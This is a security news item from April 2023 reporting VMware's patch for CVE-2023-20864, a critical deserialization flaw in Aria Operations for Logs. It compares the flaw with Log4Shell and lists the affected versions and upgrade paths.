Security News > 2023 > April > VMware patches break-and-enter hole in logging tools: update now!
The Log4Shell hole was a security flaw in the logging process itself, and boiled down to the fact that many logfile systems allow you to write what almost amount to "Mini-programs" right in the middle of the text that you want to log, in order to make your logfiles "Smarter" and easier to read. For example, if you asked Log4J to log the text I AM DUCK, Log4J would do just that.
This time round, the logging-related bug we're warning you about is CVE-2023-20864, a security hole in VMWare's Aria Operations for Logs product.
The bad news is that VMWare has given this bug a CVSS "Security danger" score of 9.8/10, presumably because the flaw can be abused for what's known as remote code execution, even by network users who haven't yet logged into the AOfL system.
The good news in this case, as far as we can tell, is that the bug can't be triggered simply by abusing the logging process via booby-trapped data sent to any server that just happens to keep logs.
That's less dramatic than Log4Shell, where the bug could, in theory at least, by triggered by network traffic sent to almost any server on the network that happened to make use of the Log4J logging code, including systems such as web servers that were supposed to be publicly accessible.
Affected versions apparently include VMware Aria Operations for Logs 8.10.2, which needs to be updated to 8.12, and an older product flavour known as VMware Cloud Foundation version 4.x, which seems to need updating to version 4.5 first, and then upgrading to VMware Aria Operations for Logs 8.12.
News URL
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2023-04-20 | CVE-2023-20864 | Deserialization of Untrusted Data vulnerability in VMWare Aria Operations for Logs and Cloud Foundation VMware Aria Operations for Logs contains a deserialization vulnerability. | 9.8 |